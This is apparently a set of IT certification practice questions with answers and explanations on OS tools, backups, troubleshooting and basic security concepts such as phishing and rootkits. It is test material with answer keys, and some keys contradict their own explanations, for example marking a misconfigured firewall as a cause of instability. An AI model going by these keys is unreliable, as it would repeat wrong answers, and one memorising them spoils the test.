Cultural sensitivity means being aware of customs and habits used by other people.
Formal attire means matching suit clothes in sober color and minimal accessories or jewelry. This is used for business meetings.
Business casual means smart clothes. Jeans, shorts and short skirts, and T-shirts are not smart workwear. Business casual is typically sufficient for troubleshooting appointments.
A teacher wishes to reform education in their school system. They are looking for low-cost operating systems to support education. Which one is best geared towards accomplishing their goal?
Windows
ChromeOS
Linux
macOS
ChromeOS
Google develops Chrome OS to run on a specific laptop (Chromebook) and PC (Chromebox) hardware. This hardware is designed for the budget and education markets.
Originally developed by Linus Torvalds, Linux is a fully open-source OS kernel derived from UNIX. There are many different Linux distributions (distros), with each maintaining its own set of packages.
macOS is only supplied with Apple-built workstations (Apple Mac desktops and Apple iMac all-in-ones) and laptops (Apple MacBooks).
While Microsoft has special discounts and deals for education, Chrome is specifically tailored towards budget and education markets.
A threat actor poses as a hiring manager for a company and asks a user for their personal credentials and to log in to a spoofed website that looks genuine. When the user confirms log-in with the spoofed website, their information is obtained. Which of the following is this attack?
Phishing
Shoulder surfing
Whaling
Tailgating
Phishing
Phishing uses social engineering techniques to make spoofed electronic communications seem authentic to the victim. A phishing message might convince the user to perform actions, such as installing malware disguised as an antivirus program.
Tailgating is when entering a secure area without authorization by following closely behind the person who has been allowed to open the door or checkpoint.
Whaling is an attack directed specifically against levels of management in the organization. Upper management may also be more vulnerable to common phishing attacks because of their reluctance to learn basic security procedures.
Shoulder surfing attacks are when the attacker learns a password, PIN, or any secure information by watching the user type it.
A Linux server administrator notices a service they do not recognize, although the environment is quite big. They look at the help file for the ksh process, but the documentation seems poor. It does seem to indicate that it provides interactivity, however. What type of program is this?
Backup
Terminal
Antivirus
Updates
Terminal
The shell provides a command environment by which a user can operate the OS and applications. Many shell programs are available with Linux, notably Bash, zsh, and ksh (Korn shell).
Products such as Clam AntiVirus (ClamAV) and the Snort Intrusion Prevention System (IPS) can be used to block varied malware threats and attempts to counteract security systems.
apt-get is a command interface for the Advanced Packaging Tool (APT). APT is used by Debian distributions and works with .deb format packages.
Linux does not have an “official” backup tool. There are plenty of commercial and open-source backup products for Linux, however. Some examples include Amanda, Bacula, Fwbackups, and Rsync.
An administrator uses a backup rotations scheme that labels the backup tapes in generations. What is this called?
Synthetic
GFS
Frequency
3-2-1 backup rule
GFS
Grandfather-father-son (GFS) is a backup rotation scheme that uses son tapes to store the most recent data and have the shortest retention period. Grandfather tapes are the oldest and have the longest retention period.
3-2-1 backup rule is a best-practice maxim that users can apply to their backup procedures to verify that they are implementing a solution to mitigate the widest possible range of disaster scenarios.
The synthetic full backup is not generated directly from the original data but instead assembled from other backup jobs.
Frequency is the period between backup jobs. If the edits are much more difficult to reconstruct, the backup frequency might need to be measured in hours, minutes, or seconds.
An IT manager is setting up an image for dispatching airplanes at a major airport. They are trying to lock down the image to run only the dispatch service. One of the layers of security is to block unneeded service ports from communicating, such as email. Where should the manager start?
Device Manager
Sound
Windows Firewall
Windows Firewall
Windows Defender Firewall determines which processes, protocols, and hosts can communicate with the local computer over the network.
In account settings, email & accounts are where sign-in credentials for other accounts can be added, such as email or social networking, which allows quick access.
The System Settings page in the Settings app presents options for configuring input and output devices, power, remote desktop, notifications, and clipboard (data copying).
Device Manager allows users to view and edit the properties of installed hardware. They can change hardware configuration settings, update drivers, or remove/disable devices.
A user receives an unsolicited call from a Microsoft support technician during a normal workday. The technician says the antivirus software on the user’s computer alerted Microsoft of a new malware infection. The technician needs to remote into the user’s computer to fix the problem. What is the technician trying to do?
Address the problem faster with a call rather than a pop-up notification alert.
Circumvent security software.
Address the problem faster with a call rather than an email.
Proactively respond to a virus alert.
Circumvent security software.
Microsoft does not directly support users and would never randomly contact a user. This scenario is a scam to try to steal a user’s credentials.
Microsoft would not receive a malware alert because the company does not directly support users. Also, Microsoft would not contact a user.
Microsoft does not directly support users and does not receive malware alerts about any user. Moreover, the company does not call users or email users.
Microsoft does not call users and would not receive an antivirus alert that would cause the company to generate a notification.
An attacker uses a set of tools designed to gain control of a computer and can create a backdoor with system-level privileges without the user noticing. What is this called?
Cryptominer
Keylogger
Rootkit
Ransomware
Rootkit
A rootkit is a malware that uses an exploit to escalate privileges after installation. The malware runs as a root with unrestricted access to everything from the root of the file system.
Ransomware is malware that tries to extort money from the victim.
Keylogger is spyware that actively attempts to steal confidential information by recording keystrokes. The attacker will usually hope to discover passwords or credit card data.
Cryptominer hijacks the resources of the host to perform cryptocurrency mining. Cryptomining is often performed across botnets which are also referred to as cryptojacking.
Which of the following accounts can users set up profile settings to synchronize between devices via the online portal?
Microsoft account
Administrator
Guest user
Local account
Microsoft account
Microsoft accounts are managed via an online portal and identified by an email address. Configuring access to an account creates a profile associated with a local account.
A local account is defined on that computer only and stored in a database known as the security account manager (SAM). A local account cannot log on to a different computer or access a file over the network.
A user account from the administrator’s group can perform all management tasks and generally has very high access to all files and other objects in the system.
A guest user is a group only present for a legacy reason. It has the same default permissions and rights as the user group.
An attacker can access a computer by executing a lunchtime attack. Which of the following principles were NOT followed that led to this attack?
Log off when not using the computer.
Disable guest accounts.
Secure PII and passwords.
Secure/protect critical hardware.
Log off when not using the computer.
Log off when not in use is a habit that users must develop each time they leave a computer unattended. Policies can configure a screensaver that locks the desktop after a period of inactivity.
Secure personal identifiable information (PII) and passwords are when paper copies of personal and confidential data must not leave where they could be read or stolen.
Secure/protect critical hardware should be a must for users to be alert to the risk of physical theft of devices.
Disabling guest accounts allow unauthorized access to the computer and may provide some sort of network access too. It is only enabled to facilitate password-less file sharing in a Windows workgroup.
A manager received a document identifying underlying causes and recommended remediation steps to mitigate the risk of repeating an issue. What is this document called?
Incident report
Asset-management database system
Asset tags
Network topology diagram
Incident report
An incident report is the summary of opinions from users/customers, technicians, managers, and stakeholders with some business or ownership in response to an incident.
Asset tags can be affixed to a device as a barcode label or radio frequency ID (RFID) sticker. An RFID tag is a chip programmed with asset data.
The network topology diagram shows how assets are linked as nodes. A topology diagram can model physical and logical relationships at different levels of scale and detail.
Asset-management database systems can be configured to store details such as type, model, serial number, asset ID, location, user(s), value, and service information.
A new employee is going over the site safety handbook about correct ways of carrying objects, so they do not damage the object or get injured. What is this called?
Air filter mask
THE CORRECT ANSWER
Lifting techniques
Trip hazard
Safety goggles
Lifting techniques
Lifting techniques are included in site safety handbooks and guidance sets out in jobs to show employees that lifting a heavy object in the wrong way can damage their back or cause muscle strains and damage the object.
Safety goggles are used to minimize the risk of burns from corrosive materials such as broken batteries, cellphones, tablets, or irritation from particles such as toner or dust.
An air filter mask that fits over the mouth and nose is a recommended face covering when working with compressed air, toner spills, or working in a dusty environment. An air filter mask will not protect the eyes.
Trip hazards are caused by putting any object in pathways where people walk.
An attacker uses a technique against a wireless network that allows them to flood access points with too many packets. What is this called?
DDoS
On-path attack
Insider threat
DoS
DoS
A denial of service (DoS) attack causes a service at a given host to fail or become unavailable to legitimate users.
An on-path attack is a specific type of spoofing where the threat actor can covertly intercept traffic between two hosts or networks, allowing the threat actor to read and possibly modify the packets.
An insider threat is an employee or other person with immediate access to internal components of the company or organization.
Distributed DoS (DDoS) means that the attacks are launched from multiple compromised systems, referred to as botnet, to perform the attack against its target.
A user just installed a new application on their workstation, but the application has issues even starting up. The user has been working on the machine regularly up to this point without any prior issues. Which of the following is most likely the issue?
Firewall
DNS
Personalization
Proxy
Firewall
In this scenario, one place to troubleshoot is the host-based firewall. Select “Allow an app through the firewall” to allow or block programs (configure exceptions) from the Windows Firewall status page.
While proxy settings could be an issue, if the user is working fine beforehand, proxy settings are not likely to be an issue.
If the user has been using the machine without any previous problems it is unlikely that the domain name system (DNS) is the issue.
The Personalization settings allow the users to select and customize themes, which set the appearance of the desktop environment.
A security researcher wants to install an older operating system for research and testing. What is the most common medium that comes with a disk that the researcher should use?
Internal hard drive
USB
Optical media
Internet-based
Optical media
Historically, most attended installations and upgrades were run by booting from optical media (CD-ROM or DVD). The optical drive must be set as the priority boot device.
Another problem with disc-based installs is that the setup disc quickly becomes out-of-date. USBs became a more popular installation mechanism for the ability to load the latest install files.
A computer that supports network boot could also be configured to boot to set up over the internet.
Once the OS has been installed, the user will usually want to set the internal hard drive as the default (highest priority) boot device and disable any other boot devices.
The electronic health records software application crashes during a busy day at a doctor’s office. The IT consultant for the practice knows that the application backs up data in real-time and has the latest update. Which of the following options is the only one that could potentially fix the crashing issue?
Uninstall and reinstall the application driver.
Try to recover data from temporary files.
Update the application driver.
Uninstall and reinstall the application.
Uninstall and reinstall the application.
Since the most recent update to the application has been applied, uninstalling then reinstalling the software is the best option of the available choices.
While preserving data is always a priority, there is no need to do so in this scenario since the application backs up in real-time. Additionally, it will not fix the problem.
Applications/software do not have drivers. Drivers are software that tells the operating system how to interact with their particular device/hardware. Drivers are updated to fix bugs and security holes or optimize the hardware.
Applications/software do not have drivers. Drivers are software that tells the operating system how to interact with their particular device/hardware. Uninstalling and reinstalling drivers is usually done when a device is malfunctioning.
A user is about to join a Zoom call and plugs in USB-C headphones with a built-in microphone to the computer’s USB 3 port. A message appears that there are “not enough USB controller resources.” Evaluate the situation and select the best fix for the problem.
Close all running programs to free up memory.
Connect the headphones to a USB 2 port.
Run the SFC to locate and update the USB controller drivers.
Open the Resource Monitor to verify the headphone’s operating system and hardware requirements are compatible with the computer’s existing resources.
Connect the headphones to a USB 2 port.
“Not enough USB controller resources” is a common warning with USB 3 ports and is generally caused by connecting too many devices. It also occurs when one device exceeds the controller’s allocated endpoints. A USB 2 port has more endpoints, so switching often solves the problem.
Closing programs can free up memory on the PC, but it does not address the resource allocation issue of the USB controller.
Verifying requirements and compatibility with the computer system’s resources does not resolve USB Controller problems.
System File Checker (SFC) is a Windows utility that scans and restores system files. It does not update drivers.
An administrator for Apple endpoints has heard about roaming profiles on Windows where users can sync certain settings from different devices. Which of the following offers a similar functionality?
Spotlight
Gestures
Keychain
iCloud keychain
iCloud keychain
The keychain feature is also available as an iCloud keychain, making the same passwords securely available across all macOS and iOS devices.
The keychain feature helps users manage passwords for these accounts, other websites, and Wi-Fi networks. The regular keychain is just local.
Spotlight Search can be used to find almost anything on macOS. To start a new search, click the magnifying glass in the menu bar.
Macs do not support touch screen interfaces, but they support gesture-enabled Magic Mouse and Magic Trackpad peripherals. To see what gestures are available on the Mac or change any settings, open the Trackpad preference pane.
An IT professional helps to fix their friend’s computer. The computer is running extremely slow. The IT professional notices the operating system is running Home edition. Which of the following is the only service available for the Home edition?
Hyper-V
RDP
BitLocker
gpedit
RDP
Remote Desktop Protocol (RDP) allows users to connect to the machine and operate it over a network. While the Home edition has the RDP client software, it does not support an RDP server.
Group Policy Editor (gpedit.msc) is used to create and apply OS and software application settings. The editor is not available in the Home edition.
BitLocker enables the user to encrypt all the information on a disk drive. BitLocker is not supported in Windows Home edition.
Pro/Enterprise editions support Hyper-V, and the Home edition does not.
Which of the following uses the file-copy tool as Windows using “robocopy”?
Automated backups
Installation applications
Remapping network devices
Restating machines
Automated backups
Automated backups are a simple type of backup that can be performed using standard file-copy tools, or the script could call functions of a proper backup utility. The script can be set to run automatically using Windows Task Scheduler or via cron in Linux.
Installation of applications is used in Windows as a setup file that can be executed in silent mode using the command switches for its installer. In Linux, scripts are often used to compile apps from source code.
Restarting machines, many types of installation or updates still require a reboot.
Remapping network devices demonstrates the need for error handling. Windows batch file uses the command “net use” to perform drive mapping.
Management provides employees with written policies and procedures to help them fulfill their tasks. Which of the following procedures requires employees to enroll and identify themselves using secure credentials?
Assigned users
New-user setup checklist
End-user termination checklist
Procedures for custom installation of software package
New-user setup checklist
The new-user setup checklist is part of the onboarding process for new employees and employees changing job roles.
The end-user termination checklist is part of the offboarding process for employees who are retiring, changing job roles, or fired. Typical tasks include returning and sanitizing devices, releasing software licenses, and disabling account permissions/access.
Procedures for custom installation of software packages include verifying system requirements, validating download/installation source, confirming license validity, adding the software to change control/monitoring processes, and developing support/training documentation.
Assigned users are when hardware assets such as workstations, laptops, smartphones, tablets, and software licenses might be assigned to an individual user account, including an inventory list of all products that the user may be using.
A technician is implementing a Linux shell script that each statement comprising the actions that the script will perform is then typically added on separate lines. Which of the following is this?
.bat
.ps1
.sh
.vbs
sh
.sh is the Linux shell script extension by convention. Every shell script starts with a shebang line designating which interpreter to use, such as Bash or Ksh. It includes a series of commands that run consecutively to carry out tasks.
.ps1 is the PowerShell script file. Microsoft provides the Windows PowerShell Integrated Scripting Environment (ISE) for rapid development.
.vbs is the VBScript file extension. VBScript predates Powershell. The wscript.exe interpreter executes VBScript by default.
.bat is the Windows batch file extension. A shell script for the basic Windows CMD interpreter is often described as a batch file.
A user receives a Windows dialog box pop-up that states 163 viruses were detected by antivirus software. When the user clicks on the pop-up, it states that to get rid of the viruses the user needs to purchase the software’s full version. What type of antivirus does the user have in this scenario?
Rogue
On-access
Defender
Execution control
Rogue
Rogue antivirus is when a website displays a pop-up disguised as a normal Windows dialog box with a fake security alert. The spoofed notification and browser ad is designed to alarm users and promote the installation of Trojan malware. Rogue antivirus is a popular way to disguise a Trojan.
Windows Defender Antivirus is a core component of all Windows editions. It will not generate pop-up messages to purchase the full version.
On-access is a scanning technique where the antivirus software scans the file before opening or prevents it from opening.
Execution control refers to logical security technologies designed to prevent malicious software from running on a host regardless of user account privileges.
A server administrator notices a file server starting to run low on space. The administrator wants to create extra space before all space is used up and even worse issues arise. What should the administrator use?
devmgmt.msc
dfrgui.exe
cleanmgr.exe
Disk queue length
cleanmgr.exe
The Disk Cleanup utility (cleanmgr.exe) regains disk capacity by deleting unwanted files, which can help to free up disk space when running low.
Device Manager (devmgmt.msc) allows the administrator to view and edit the properties of installed hardware. Users can change hardware configuration settings, update drivers, or remove/disable devices.
If the disk queue length increases and disk time is high, then the administrator has a disk problem; this will not help free up space.
The Defragment and Optimize Drives utility (dfrgui.exe) maintains disk performance by optimizing file storage patterns and can help read and write speeds with hard drives.
A Linux server administrator meets with their Windows server administrator counterparts. A certain grouping of Linux and Windows servers is designated to run services that share files. What will the administrators need to enable sharing between the disparate systems?
ip
samba
mv
chmod
samba
samba enables the integration of Linux and Windows systems. When added to a Linux workstation, that workstation can use the Windows file and print sharing protocol to access shared resources on a Windows host.
As part of the iproute2 package, the ip command has options for managing routes and the local interface configuration. The command ip addr replicates the basic reporting functionality of ifconfig (show the current address configuration).
The chmod command can secure files and directories using symbolic or octal notation. Only the owner can change permissions.
The mv command is used to move files from one directory to another or rename a file.
An attacker imitates an IT support technician for a company. The attacker asks for a user’s password to gain access to the user’s system remotely. What is this called?
Impersonation
Dumpster diving
Shoulder surfing
Tailgating
Impersonation
Impersonation means that the attacker develops a pretext scenario to allow themselves to interact with an employee.
Dumpster diving refers to combing through an organization’s or individual’s garbage to try to find useful documents. Attackers may even find files stored on discarded removable media.
Shoulder surfing attacks are when the attacker learns a password, PIN, or any secure information by watching the user type it.
Tailgating is when entering a secure area without authorization by following closely behind the person who has been allowed to open the door or checkpoint.
A user implements a method that requires a one-time code within a given time frame to get access to their email account. What is this method?
Soft token
Phone call
Hard token
SMS
Soft token
A soft token is a piece of a two-factor security token that generates a single-use login PIN to authorize computer services.
Hard tokens require the user to physically possess their authentication device to gain access to a specific network. The hard token is first registered with the service or network. When the user needs to authenticate, they connect the token and authorize it via a password, PIN, fingerprint reader, or voice recognition.
Short message service (SMS) is a text messaging service between mobile phones. The short messaging service allows up to 160 characters between phones.
Authenticator applications can be used for password-less access used as two-factor authentication (2FA) mechanisms.
A company has backup storage located at a different location, which lowers the risk of losing both productions and backup copies of data. Which of the following is this backup storage?
Off-site backup storage
On-site backup storage
Synthetic
Frequency
Off-site backup storage
Off-site backup storage is more affordable and easier to implement because of the high-bandwidth internet and high-capacity cloud storage providers. Transporting media offsite can be an onerous task.
A synthetic full backup is not generated directly from the original data but instead assembled from other backup jobs.
Frequency is the period between backup jobs. If the edits are much more difficult to reconstruct, the backup frequency might need to be measured in hours, minutes, or seconds.
On-site backup storage means that the production system and backup media are in the same location. Having storage in the same location risks losing both the production and backup copies of the data.
To ensure the authenticity and authorization of a mobile app, a service provider issues a certificate to valid developers. Developers can use this certificate to sign their app, and to establish trust. Which of the following attributes of an app would likely disqualify as trustworthy?
Duplicates the function of a VPN.
Duplicates the function of IoT.
Duplicates the function of core OS apps.
Duplicates the function of MDM.
Duplicates the function of core OS apps.
A mobile app that duplicates the function of core operating system (OS) apps would be at risk of not receiving trusted app status.
A virtual private network (VPN) is a secure tunnel created between two endpoints connected via an unsecured transport network. VPNs are not proprietary.
Mobile-device management (MDM) is a software tool for tracking, controlling, and securing an organization’s mobile infrastructure. MDMs are not proprietary.
Internet of Things (IoT) is a global network of personal devices, home appliances and control systems, and other items with network connectivity. An app could not duplicate IoT.
A computer administrator sets up a client workstation to join a centrally managed network. What options should the administrator configure to do this?
Apps
Sign-in options
Update and security
Access work or school
Access work or school
Access work or school under the Account settings app joins the computer to a centrally managed domain network.
Configure sign-in options under Account settings using a fingerprint reader or PIN to access the computer rather than a password. The computer can also be set to lock automatically from here.
The Update & Security settings provide a single interface to manage a secure and reliable computing environment.
The Apps group is used to view and remove installed apps and Windows Features in the Settings app. Users can also configure which app should act as the default for opening, editing, and printing particular file types and manage which apps run at startup.
An intern for a Windows server team is watching a server administrator verify the authenticity and integrity of an installer. Where did the administrator most likely get it from?
Internet download
USB
Share drive
ISO
Internet download
When downloading an installer from an internet location, it is imperative to verify the package’s authenticity and integrity and scan it for malware.
Setup files can be distributed on physical media, such as CD/DVD or a USB thumb drive. USBs might be a secondary medium after it was downloaded from the internet first, however.
If an administrator was pulling a file from a local share, it probably first came from the internet and should have been scanned during the initial download.
ISO files stored on removable media or a host system are often used to install virtual machine operating systems. The file itself might be an ISO, but they would have had to get it from somewhere.
If an individual is creating an account and unable to think of a strong key code word, the browser can suggest strong keycodes to use. What is this called?
Secure connection
Password manager
Browser sign-in
Ad-blocker
Password manager
Password managers suggest a strong password at each new account sign-up or credential reset and autofill this value when the user needs to authenticate to the site.
Browser sign-in allows the user to synchronize settings between instances of the browser software on different devices.
Secure connection validates the host’s identity running a site and encrypts communications to protect against snooping.
Ad blockers use more sophisticated techniques to prevent displaying anything that does not seem to be part of the site’s main content or functionality. Many sites detect ad blockers and do not display any content while enabling filtering.
A systems administrator for client machines has managed Windows machines for some time. The company is now adding Apple computers. The security team wants to implement an equivalent to Bitlocker. Which of the following should the administrator enable and configure?
Time Machine
Keychain
Privacy
FileVault
FileVault
FileVault is a disk encryption product. Encryption protects the data stored on a disk against the possibility that a threat actor could remove it.
macOS has options to configure what analytics/telemetry data and personalized information can be collected. Users can adjust these options via the Security & Privacy preference pane.
The Time Machine preference pane lets data back up to an external drive or partition formatted using either the Apple File System (APFS) or macOS’s older extended file system.
The keychain feature helps users manage passwords for these accounts, other websites, and Wi-Fi networks. The regular keychain is just local.
An accountant has an unlimited data plan and has set data usage limit triggers for their mobile phone. What concern does the accountant have with high data usage with an unlimited data plan? (Select all that apply.)
SELECT ALL THAT APPLY
DDoS
Cryptomining
Jailbreaking
Phishing
DDoS
Cryptomining
Even with an unlimited data plan, setting data usage limits allows a user to be alerted to unusually high data usage like that associated with cryptomining.
Even with an unlimited data plan, setting data usage limits allows a user to be alerted to unusually high data usage associated with being used as part of a distributed denial of service (DDoS) attack.
Phishing is when an attacker sends an email from a supposedly reputable source to elicit private information from the victim.
Jailbreaking removes the protective seal and any operating system-specific restrictions to give users greater control over the device.
After installing Windows 10 on an old computer, a computer technician is stumped when the computer continues to boot to a blank screen. Determine which ones could conceivably fix the blank screen from the available solutions. (Select all that apply.)
SELECT ALL THAT APPLY
Run the IDLE debugger.
Repair Windows.
Update the graphics adapter driver.
Defrag the hard drive.
Repair Windows.
Update the graphics adapter driver.
A blank screen following a Windows installation could be caused by several factors, including an interruption to the installation process and an incomplete install. Repairing Windows could address this.
Updating the graphics driver is another possible remedy since the driver may be outdated and incompatible with Windows 10.
IDLE is the Python Integrated Development and Learning Environment. While IDLE does have a debugger, it is for Python scripts, not Windows issues.
Defragging the hard drive is done to optimize file storage and improve sluggish performance. It would not fix a blank screen.
A user’s phone begins to act strangely, with apps responding slowly and pop-up ads appearing frequently. When the user calls the help desk and explains the issues, the technician says it sounds like malware. What other symptoms would be common to a malware infection on a mobile phone? (Select all that apply.)
SELECT ALL THAT APPLY
Increased Response Times
APK sideloading
Redirection
Fake security warnings
Redirection
Fake security warnings
Fake security warnings are a common symptom of malware infection. Scareware uses these to persuade users to install an app or give a Trojan app additional permissions.
Redirection attacks are a common symptom, where malware corrupts the Domain Name System (DNS) and search provider to force users to spoofed sites. This might disrupt access to legitimate sites, generate certificate warnings, and cause slow network performance.
APK (Android Package) sideloading refers to downloading apps for Android phones from a source other than Google’s Play store.
A lockout occurs after a maximum number of failed sign-in attempts.
Malware encyclopedias are a resource that antivirus vendors often make available to IT professionals. What is their value for IT practitioners? (Select all that apply.)
SELECT ALL THAT APPLY
They are documentation of known malware.
They provide information about the type, symptoms, purpose, and removal of malware.
They troubleshoot unknown malware based on the behavior of known malware.
They provide a pricing model for remediation based on the malware found.
They are documentation of known malware.
They provide information about the type, symptoms, purpose, and removal of malware.
Malware encyclopedias from antivirus vendors, also called “bestiaries,” maintain information about the malware that IT professionals can use to verify and remediate malware. Information includes the type of malware, the symptoms, and the purpose.
Antivirus companies document known malware by maintaining encyclopedias, including information about the makeup, behavior, and removal process.
Malware encyclopedias do not troubleshoot known or unknown malware; they are a verification and remediation reference for known malware.
Pricing or a pricing model for malware remediation is out of the purview of an antivirus vendor’s malware encyclopedia.
A telltale sign of a malware infection is when changes occur to system files. Which of the following is likely the result of malware-induced changes to system files? (Select all that apply.)
SELECT ALL THAT APPLY
Files with date stamps and file sizes that are different from known-good versions
Additional files with names similar to authentic system files, such as scvhost.docx or ta5kmgr.xlsx
Files that are missing or renamed
Known-good files with expired certificates
Files with date stamps and file sizes that are different from known-good versions
Files that are missing or renamed
System files are an attractive target for malware because renaming or deleting them can wreak havoc on the operating system.
Hackers will alter the size of system files to hide malware or change the date stamp to cover their tracks.
While malware will add additional files with names almost the same as authentic system files, the extensions .docx and.xlsx represent Word and Excel files, respectively. These are data files, not system files. System files have extensions such as .dll and .sys.
System files do not have certificates. Certificates are a security tool used by websites to prove the server is trusted.
A company needs to set up perimeter security to control and monitor who can approach the building. Which of the following should the company use? (Select all that apply.)
SELECT ALL THAT APPLY
Access control vestibule
Fencing
Folder redirection
Guard
Access control vestibule
Fencing
Guard
Fencing is generally effective and needs to be transparent, so guards can see any attempt to penetrate it.
Access control vestibule is where one gateway leads to an enclosed space protected by another barrier that restricts access to one person at a time. Bollards are barricades that prevent vehicles from crashing into the building or exploding a bomb near it.
Guards can be placed in front of and around a location to protect it. They can monitor critical checkpoints and verify identification, allow, or disallow access, and log physical entry occurrences.
Folder redirection changes the target of a personal folder, such as the Documents folder, Pictures folder, or Start Menu folder, to a file share.
The System Restore tool in Windows is used to roll back configuration changes to an earlier date or restore point. One option for creating restore points is to use Task Scheduler. What other actions will create a restore point? (Select all that apply.)
SELECT ALL THAT APPLY
Installing a program
Rebooting
Deleting a file
Updating an application
Installing a program
Updating an application
Whenever an application or program is installed, a restore point is created.
A restore point is also created whenever an application or program is updated.
Deleting a file will not create a restore point. Likewise, when using System Restore to roll back to an earlier date, the user’s documents, pictures, and other data are not deleted. However, software and drivers installed after the restore point will be uninstalled.
A restore point is not created when a computer is rebooted, but Windows will create a restore point if one has not occurred in seven days.
Most vendors have recycling systems for what types of products? (Select all that apply.)
SELECT ALL THAT APPLY
Battery
Toner
Device
Voltage
Battery
Toner
Device
Recycling used toner cartridges is offered at most vendors. The products in toner powder are not classified as hazardous to health.
Batteries must be disposed of through an approved waste facility. Swollen or leaking batteries from devices must be handled carefully and stored within appropriate containers. Gloves and safety goggles may be used to minimize the risk of burns from the corrosive material.
Device disposal can be donated, and if it can not be reused, it must be disposed of through the approved waste facility.
Voltage is the potential difference between two points measured in volts (V).
A user requests a site’s certificate, but an evil twin intercepts the request and presents a spoofed certificate, which the user’s browser accepts. What has just happened? (Select all that apply.)
SELECT ALL THAT APPLY
The user thinks they have a secure connection.
An on-path attack
A rootkit attack
Malware is in the middle of the session.
The user thinks they have a secure connection.
An on-path attack
Malware is in the middle of the session.
An on-path attack is when a threat actor, such as an evil twin, intercepts traffic between two hosts. In this case, it was via a spoofed digital certificate.
In the middle of the session, the evil twin intercepts traffic between two hosts; this was known as a “Man-in-the-Middle” attack in a former time.
Since the user’s browser has accepted the spoofed digital certificate, the user believes they have a secure session, even though they do not.
A rootkit is a malware that modifies system files, often at the kernel (root) level.
A user experiences significant system instability on their computer. It frequently shuts down, freezes, reboots, and powers off with no accompanying error messages. Which of the following problems would cause this instability? (Select all that apply.)
SELECT ALL THAT APPLY
Too many connected devices
Misconfigured firewall
Overheating
Failing CPU
Misconfigured firewall
Overheating
Failing CPU
Excessive heat can damage computer circuitry and induce shutdowns, freezing, and reboots. A common cause of overheating is fans clogged with dust.
A failing CPU can lead to crashes, freezing, and reboots. Overheating and power surges are often to blame for damage to the CPU.
A misconfigured firewall introduces the risk of a malware infection that could cause some of these instability symptoms. However, in and of itself, it does not.
Too many connected devices will generate a warning message that there are not enough USB resources. This situation will not shut down the computer or make it freeze or reboot.
Which of the following are proper component handling tools and techniques to protect electronic components against electronic discharge when fixing a PC or mobile device? (Select all that apply.)
SELECT ALL THAT APPLY
Air filter mask
ESD mat
ESD straps
Safety goggles
ESD mats
ESD straps
Anti-electrostatic discharge (ESD) straps are worn to dissipate static charges effectively. The band should fit snugly around the wrist or ankle so that the metal stud contacts the skin.
Electrostatic discharge (ESD) mats are used to organize sensitive components. The mats contain a snap connected to the wrist or leg strap.
Safety goggles are used to minimize the risk of burns from corrosive materials such as broken batteries, cellphones, tablets, or irritation from particles such as toner or dust.
An air filter mask that fits over the mouth and nose is a recommended face covering when working with compressed air, toner spills, or working in a dusty environment. An air filter mask will not protect the eyes.
A malware infection can manifest in many ways, often making it difficult to diagnose. Malware may cause which of the following computer issues? (Select all that apply.)
SELECT ALL THAT APPLY
Redirection
Roaming profiles
UAC is enabled
Windows update fails
Redirection
Windows update fails
One of the key indicators of malware infection is that security-related applications, such as antivirus, firewall, and Windows Update, stop working. Other applications or Windows tools, such as Task Manager, may also stop working or crash frequently.
Malware often targets the web browser. An example is a redirection, where the user tries to open one page but gets sent to another.
User Account Control (UAC) is a system to prevent unauthorized use of administrator privileges. Malware may try to disable UAC, but it would not enable it.
Roaming profiles copies the whole profile from a share at logon and copies the updated profile back at logoff.
user has owned the same personal computer for a while and thinks it might be time for an upgrade. Which of the following are upgrade considerations? (Select all that apply.)
SELECT ALL THAT APPLY
PXE support
Backup files
Application support
Hardware compatibility
Backup files
Application support
Hardware compatibility
Hardware compatibility is a consideration. The user must make sure that the central processing unit (CPU), chipset, and RAM components are sufficient to run the OS.
Application and driver support and backward compatibility are other considerations. Most version upgrades try to maintain support for applications and device drivers developed for older versions.
Backup files and user preferences are a consideration. If the user is installing a new operating system or doing a clean install, the user should back up any necessary data and settings.
Most computers now come with a Preboot eXecution Environment (PXE)–compliant firmware and network adapter to support this boot option and is not necessarily a consideration.
A technician needs this skill to give full attention to the customer, so there is no disagreement or misinterpretation of what was said. What is this skill?
Proper language
Cultural sensitivity
Active listening
Open-end questions
Active listening
Active listening is the skill of listening to an individual giving that person the full attention and not arguing with, commenting on, or misinterpreting what they have said.
Proper language is not being overly familiar with customers. Do not use slang phrases and any language that may cause offense. When active listening, the employee makes a conscious effort to focus on what the other person is saying.
Cultural sensitivity means being aware of other people’s customs and habits, not judging the customer.
Open-ended questions invite the other person to compose a response.
An IT manager is in charge of client machine administration. The manager wants to test various boot settings before applying them to the environment. Which tool can the manager use to accomplish this best?
msconfig.exe
dfrgui.exe
gpedit.msc
cleanmgr.exe
msconfig.exe
The System Configuration Utility (msconfig.exe) is used to modify various settings and files that affect the way the computer boots and loads Windows.
The Group Policy Editor (gpedit.msc) provides a more robust means of configuring many Windows settings than editing the registry directly.
The Disk Cleanup utility (cleanmgr.exe) regains disk capacity by deleting unwanted files and can help to free up disk space when running low.
The Defragment and Optimize Drives utility (dfrgui.exe) maintains disk performance by optimizing file storage patterns which can help read and write speeds with hard drives.
A software company hires a new app developer. The corporate network denies access when the developer tries to connect their phone. Why would the network deny access from the developer’s mobile phone?
Sluggish response time
High network traffic
App spoofing
Developer mode
Developer mode
The developer’s phone is in developer mode. The company’s Mobile Device Management (MDM) system blocks access to the network because developer mode can be used to install bootleg apps.
High network traffic is a bandwidth utilization issue; it would not cause access to the network to be denied.
App spoofing is when a malicious app will typically spoof a legitimate app by using a similar name and fake reviews and automated downloads to boost its apparent popularity.
Sluggish response time on a mobile device could be caused by malware, too many open apps, and a low battery charge, among other things. It would not cause the device to be denied network access.
A user is buying software for their PC. Which of the following would the user be purchasing for individual use?
Personal license
DRM
Data retention requirements
Corporate-use license
Personal license
A personal license allows the product to be used by a single person at a time, though it might permit installation on multiple personal devices.
A corporate-use license is for multiple users, which means the company can install the software on an agreed-upon number of computers for its employees to use simultaneously. The company will offer a valid license with the product key. These can be non-expired licenses as well.
Data retention requirements are regulations that set a maximum period for data retention. The regulation might also demand that information be retained for a minimum period.
Digital music and video are often subject to copy protection and digital rights management (DRM).
A server administrator experiences performance issues on a server and needs to narrow down the source of the problem. The server is an externally facing website with high visibility for the company. The longer the site is having issues, the more customers might notice and possibly damage the company’s reputation. What can the administrator use to view and log performance statistics? (Select all that apply.)
SELECT ALL THAT APPLY
resmon.exe
msinfo32.exe
perfmon.msc
devmgmt.msc
resmon.exe
perfmon.msc
Resource Monitor (resmon.exe) is used to view and log performance statistics. A Microsoft Management Console (MMC) contains one or more snap-ins used to modify advanced settings for a subsystem.
Performance Monitoring (perfmon.msc) is also used to view and log performance statistics. The administrator can use this to identify the source of the issue.
